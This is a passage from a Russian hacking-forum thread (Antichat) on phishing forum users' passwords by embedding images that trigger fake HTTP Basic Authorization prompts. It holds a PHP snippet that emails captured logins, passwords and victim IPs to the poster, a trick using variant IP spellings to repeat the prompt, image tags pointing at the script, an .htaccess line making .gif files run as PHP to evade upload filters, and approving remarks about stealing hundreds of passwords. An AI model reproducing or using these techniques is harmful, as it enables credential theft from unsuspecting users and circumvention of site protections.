Авторские статьи Применение Basic Authorization против форумов

Discussion in 'Статьи' started by hidden, 25 Jun 2006.

Page 3 of 3
  1. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Code:
    [color=#00AA00][color=#00FF00]mail[/COLOR][color=#0000FF]([/COLOR]
  [/COLOR][color=#FFFF00]'Ваше мыло@ya.ru'[/COLOR][color=#00AA00][color=#0000FF],[/COLOR]
  [/COLOR][color=#FFFF00]'Basic Authorization против форумов'[/COLOR][color=#00AA00][color=#0000FF],[/COLOR]
  [/COLOR][color=#FFFF00]"[color=#00AA00]$login[/COLOR]:[color=#00AA00]$pass[/COLOR][color=#FFFFFF]\n[/COLOR]"[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]
  [/COLOR][color=#FFFF00]'IP: '[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]$_SERVER[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'REMOTE_ADDR'[/COLOR][color=#00AA00][color=#0000FF]],[/COLOR]
  [/COLOR][color=#FFFF00]'[email protected]'[/COLOR][color=#00AA00][color=#0000FF],[/COLOR]
  [/COLOR][color=#FFFF00]'Content-Type: text/plain;'[/COLOR][color=#00AA00]
[color=#0000FF])[/COLOR][color=#FF0000];[/COLOR][/COLOR]
    Хотя в файл сохранять помоему гораздо удобние и быстрее
     
    #41 hidden, 30 Dec 2006
    2 people like this.
  2. Arin

    Arin Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    67
    Likes Received:
    29
    Reputations:
    6
    Cпасибо за нормальный код. :)

    В файл - да, удобнее, но не в этот раз.
     
    #42 Arin, 30 Dec 2006
  3. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Ребята, а как же сделать чтоб вылазило 50 таких табличек?????
    Это что нужно 50 таких скриптов делать? =)
     
    #43 wils, 12 Aug 2007
  4. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    и ещё, может ламерский вопрос, но как узнать IP адрес своего сайта, ну типа для www.site.ru будет 85.101.33.201.
     
    #44 wils, 12 Aug 2007
  5. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    пропинговать попробуй )
     
    #45 nerezus, 12 Aug 2007
  6. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    эммммм......=)
    А вот ещё
    Code:
    Ребята, а как же сделать чтоб вылазило 50 таких табличек?????
Это что нужно 50 таких скриптов делать? =)
    Как тут быть??????
     
    #46 wils, 12 Aug 2007
  7. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    127.0.0.1, 127.00.0.1, 127.0.00.1, 127.0.0.01 и даже 0177.0.0.1 - эти 5 строк обозначают один и тот-же ip адрес но для браузера это разные хосты, а значит, для каждого из них нужно запросить авторизацию ;) .
     
    #47 hidden, 14 Aug 2007
  8. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Простите плизз мою тупость, но если я правельно всё понял, то так:
    <img src="127.0.0.1/img.php">
    <img src="127.00.0.1/img.php">
    <img src="127.0.00.1/img.php">
    <img src="0177.0.0.1/img.php">
     
    #48 wils, 15 Aug 2007
    Last edited: 16 Aug 2007
    1 person likes this.
  9. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Хотелось бы поделиться кое-чем. Сегодня встретил фильтрацию по расширению на форуме Invision Power Board(U) v1.3.1 Final, когда хотел разместить этот скрипт. Уже было отчаялся, но вспомнил про htaccess! Создаём на хосте папку, куда кидаем файл с расширением .htaccess со следующим содержанием:

    Code:
    AddType application/x-httpd-php .gif
    Вместо .gif подставляем нужное расширение. Готово! Кидаем скрипт с этим же расширением в ту же папку! Теперь ваш скрипт пройдёт любую фильтрацию по расширению!
     
    #49 XenOtai, 25 Aug 2007
    1 person likes this.
  10. zl0y

    zl0y Banned

    Joined:
    13 Sep 2006
    Messages:
    371
    Likes Received:
    270
    Reputations:
    109
    hidden Молодец ! Статья ничего,побалываться и увести пару трой сотен паролей сойдет :) НАпример :"Введи пасс егорыч :)....",ну это я пошутил если вы непоняли :)
     
    #50 zl0y, 26 Aug 2007
  11. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Я вот нашёл такую статью. :) Причём здесь же, на ачате. ;)

    Кому интересно, смотрим тут:

    http://forum.antichat.ru/thread7169.html

    А вот цитата оттуда:

     
    #51 XenOtai, 16 Sep 2007
    1 person likes this.
  12. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Чтож, значит я был не первый...
     
    #52 hidden, 17 Sep 2007
  13. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    #53 NOmeR1, 17 Sep 2007
    Zhigan and hidden like this.
  14. GRAVITY

    GRAVITY New Member

    Joined:
    29 Aug 2007
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    Возник вопрос - а можно с помощью GIF-инъекции украсть куки пользователя, посетившего инфицированную страничку ? :confused:
     
    #54 GRAVITY, 12 Oct 2007
  15. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Первый раз слышу. Если ты имеешь ввиду картинку, "написанную" на php, то нет.
     
    #55 NOmeR1, 12 Oct 2007
  16. GRAVITY

    GRAVITY New Member

    Joined:
    29 Aug 2007
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    А какие самые простые способы есть перехвата кукинсов ?

    (сори за оффтоп)
     
    #56 GRAVITY, 13 Oct 2007
  17. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    1) Нет такого понятия как "gif-инъекции".
    2) Украсть куки описанным способом нельзя.
     
    #57 hidden, 15 Oct 2007
  18. {iddqd}

    {iddqd} Member

    Joined:
    22 Dec 2011
    Messages:
    170
    Likes Received:
    99
    Reputations:
    2
    [​IMG]
     
    #58 {iddqd}, 6 Feb 2016
  19. Turanchocks_

    Turanchocks_ Elder - Старейшина

    Joined:
    11 May 2013
    Messages:
    1,327
    Likes Received:
    3,285
    Reputations:
    17
    Нихуя себе!
     
    #59 Turanchocks_, 6 Feb 2016
  20. Zhigan

    Zhigan New Member

    Joined:
    21 Dec 2015
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Годно
     
    #60 Zhigan, 7 Feb 2016
(You must log in or sign up to post here.)
Page 3 of 3
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.